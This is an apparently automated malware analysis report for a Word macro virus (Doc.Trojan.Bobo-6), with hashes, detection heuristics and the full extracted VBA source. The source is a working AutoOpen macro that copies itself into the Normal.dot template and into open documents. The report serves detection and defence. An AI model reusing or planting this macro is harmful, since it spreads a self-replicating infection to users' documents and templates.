Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3807324cef799d05…

MALICIOUS

Office (OLE)

38.0 KB Created: 2003-08-15 09:19:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-17
MD5: 2d86746bffa4b98cc4e1aad314a384e0 SHA-1: 2031a090f17e6254ab700a5d836fff36b049cd4b SHA-256: 3807324cef799d05d8ebc783cbd20b95bf1e32452867f9db562c0cac02f0dfe2
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros, including an AutoOpen macro, which is designed to execute automatically when the document is opened. The script attempts to copy itself to the Normal.dot template and the active document, indicating a self-replication and persistence mechanism. This behavior is characteristic of macro-based malware.

Heuristics 5

  • ClamAV: Doc.Trojan.Bobo-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bobo-6
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
         Application.OrganizerCopy Source:=s, Destination _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1457 bytes
SHA-256: c39937078cbaf6e634c0bfb100b020cc39054d98bf06181c77bb5ac1e05eaa06
Detection
ClamAV: Doc.Trojan.Bobo-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Modulo1"
Sub autoOpen()
Attribute autoOpen.VB_Description = "Macro creada el 09/04/96 por osvald"
Attribute autoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
  t = False
  s = ActiveDocument.Path + "\" + ActiveDocument.Name
  ss = NormalTemplate.Path + "\" + NormalTemplate.Name
  For Each mhac In NormalTemplate.VBProject.VBComponents
    If mhac.Name = "Modulo1" Then t = True
  Next mhac
  If t = False Then
     Application.OrganizerCopy Source:=s, Destination _
     :=ss, Name:="Modulo1", Object:=wdOrganizerObjectProjectItems
     If Err.Number <> 0 Then
       Exit Sub
     End If
     NormalTemplate.Save
     If Err.Number <> 0 Then
       Exit Sub
     End If
  End If
  t = False
  For Each mhac In ActiveDocument.VBProject.VBComponents
    If mhac.Name = "Modulo1" Then t = True
  Next mhac
  If t = False Then
0  Application.OrganizerCopy Source:=ss, Destination _
       :=s, Name:="Modulo1", Object:=wdOrganizerObjectProjectItems
     If Err.Number <> 0 Then
        Exit Sub
     End If
     
     ActiveDocument.Save
     If Err.Number <> 0 Then
       Exit Sub
      End If
   End If
End Sub